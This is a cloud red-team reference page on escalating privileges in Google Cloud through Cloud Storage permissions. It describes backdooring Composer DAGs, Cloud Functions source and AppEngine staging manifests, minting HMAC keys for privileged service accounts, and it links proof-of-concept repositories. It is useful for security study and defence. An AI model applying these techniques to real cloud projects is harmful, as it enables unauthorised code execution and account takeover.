GCP - Storage Privesc
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Basic Information:
GCP - Storage Enumstorage.objects.get
This permission allows you to download files stored inside Cloud Storage. This will potentially allow you to escalate privileges because in some occasions sensitive information is saved there. Moreover, some GCP services stores their information in buckets:
GCP Composer: When you create a Composer Environment the code of all the DAGs will be saved inside a bucket. These tasks might contain interesting information inside of their code.
GCR (Container Registry): The image of the containers are stored inside buckets, which means that if you can read the buckets you will be able to download the images and search for leaks and/or source code.
storage.objects.setIamPolicy
You can give you permission to abuse any of the previous scenarios of this section.
storage.buckets.setIamPolicy
For an example on how to modify permissions with this permission check this page:
GCP - Public Buckets Privilege Escalationstorage.hmacKeys.create
Cloud Storage's "interoperability" feature, designed for cross-cloud interactions like with AWS S3, involves the creation of HMAC keys for Service Accounts and users. An attacker can exploit this by generating an HMAC key for a Service Account with elevated privileges, thus escalating privileges within Cloud Storage. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain perpetually accessible, allowing for potential backup access storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable post-creation, adding a layer of complexity for continuous access.
Another exploit script for this method can be found here.
storage.objects.create
, storage.objects.delete
= Storage Write permissionsIn order to create a new object inside a bucket you need storage.objects.create
and, according to the docs, you need also storage.objects.delete
to modify an existent object.
A very common exploitation of buckets where you can write in cloud is in case the bucket is saving web server files, you might be able to store new code that will be used by the web application.
Composer is Apache Airflow managed inside GCP. It has several interesting features:
It runs inside a GKE cluster, so the SA the cluster uses is accessible by the code running inside Composer
All the components of a composer environments (code of DAGs, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and whenever a DAG is created or updated, submit a backdoored version so the composer environment will get from the storage the backdoored version.
You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs
Cloud Functions code is stored in Storage and whenever a new version is created the code is pushed to the bucket and then the new container is build from this code. Therefore, overwriting the code before the new version gets built it's possible to make the cloud function execute arbitrary code.
You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions
AppEngine versions generate some data inside a bucket with the format name: staging.<project-id>.appspot.com
. Inside this bucket, it's possible to find a folder called ae
that will contain a folder per version of the AppEngine app and inside these folders it'll be possible to find the manifest.json
file. This file contains a json with all the files that must be used to create the specific version. Moreover, it's possible to find the real names of the files, the URL to them inside the GCP bucket (the files inside the bucket changed their name for their sha1 hash) and the sha1 hash of each file.
Note that it's not possible to pre-takeover this bucket because GCP users aren't authorized to generate buckets using the domain name appspot.com.
However, with read & write access over this bucket, it's possible to escalate privileges to the SA attached to the App Engine version by monitoring the bucket and any time a change is performed (new version), modify the new version as fast as possible. This way, the container that gets created from this code will execute the backdoored code.
The mentioned attack can be performed in a lot of different ways, all of them start by monitoring the staging.<project-id>.appspot.com
bucket:
Upload the complete new code of the AppEngine version to a different and available bucket and prepare a manifest.json
file with the new bucket name and sha1 hashes of them. Then, when a new version is created inside the bucket, you just need to modify the manifest.json
file and upload the malicious one.
Upload a modified requirements.txt
version that will use a the malicious dependencies code and update the manifest.json
file with the new filename, URL and the hash of it.
Upload a modified main.py
or app.yaml
file that will execute the malicious code and update the manifest.json
file with the new filename, URL and the hash of it.
You can find a PoC of this attack in the repo: https://github.com/carlospolop/Monitor-Backdoor-AppEngine
Google Container Registry stores the images inside buckets, if you can write those buckets you might be able to move laterally to where those buckets are being run.
The bucket used by GCR will have an URL similar to gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com
(The top level subdomains are specified here).
This service is deprecated so this attack is no longer useful. Moreover, Artifact Registry, the service that substitutes this one, does't store the images in buckets.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)